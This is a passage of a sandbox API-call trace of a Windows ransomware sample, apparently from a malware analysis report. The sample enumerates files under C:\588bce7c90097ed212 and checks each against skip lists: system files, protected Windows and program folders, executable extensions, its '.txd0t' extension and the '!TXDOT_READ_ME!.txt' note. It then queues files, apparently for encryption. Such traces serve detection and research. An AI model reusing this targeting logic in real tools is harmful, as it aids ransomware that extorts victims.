(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.108] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.182] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.182] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1046\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\eula.rtf" [0086.182] SetEvent (hEvent=0x410) returned 1 [0086.182] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.182] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.182] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.182] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0086.182] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0086.182] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0086.182] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.182] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.182] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.182] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.182] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.183] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0086.185] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.185] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0086.185] SetEvent (hEvent=0x418) returned 1 [0086.185] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.185] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.185] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.186] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1046", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046") returned="C:\\588bce7c90097ed212\\1046" [0086.186] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\") returned="C:\\588bce7c90097ed212\\1046\\" [0086.186] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1046\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" [0086.186] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.186] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.186] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.186] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.186] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.186] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.186] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0086.186] GetProcessHeap () returned 0xe30000 [0086.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.186] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1049", cAlternateFileName="")) returned 1 [0086.186] StrCmpW (psz1="1049", psz2=".") returned 1 [0086.186] StrCmpW (psz1="1049", psz2="..") returned 1 [0086.186] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.186] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.186] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1049", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0086.186] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system32\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\system\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\local\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\boot\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\perflogs\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\programdata\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\drivers\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\wsus\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="crypt_detect") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="cryptolocker") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="ransomware") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\WINDOWS") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.187] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1049", lpSrch="C:\\Program Files") returned 0x0 [0086.187] GetProcessHeap () returned 0xe30000 [0086.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.187] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0086.187] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\*") returned="C:\\588bce7c90097ed212\\1049\\*" [0086.187] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0086.187] StrCmpW (psz1=".", psz2=".") returned 0 [0086.187] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.187] StrCmpW (psz1="..", psz2=".") returned 1 [0086.187] StrCmpW (psz1="..", psz2="..") returned 0 [0086.188] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.188] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.188] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.188] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0086.188] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0086.188] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="C:\\588bce7c90097ed212\\1049\\eula.rtf" [0086.188] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.188] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.188] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.188] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.188] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.188] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.208] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.208] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1049\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\eula.rtf" [0086.208] SetEvent (hEvent=0x410) returned 1 [0086.209] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.209] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.209] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.209] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0086.209] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0086.209] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0086.209] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.209] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.209] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.209] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.209] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.209] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0086.237] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.237] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" [0086.237] SetEvent (hEvent=0x408) returned 1 [0086.237] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.237] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.237] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.237] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1049", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049") returned="C:\\588bce7c90097ed212\\1049" [0086.237] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\") returned="C:\\588bce7c90097ed212\\1049\\" [0086.237] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1049\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" [0086.237] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.237] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.237] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.238] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.238] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.238] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.238] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.238] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.238] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.238] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.238] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0086.238] GetProcessHeap () returned 0xe30000 [0086.238] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.238] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1053", cAlternateFileName="")) returned 1 [0086.238] StrCmpW (psz1="1053", psz2=".") returned 1 [0086.238] StrCmpW (psz1="1053", psz2="..") returned 1 [0086.238] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.238] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.238] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1053", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1053") returned="C:\\588bce7c90097ed212\\1053" [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system32\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\system\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.238] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1053", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.238] 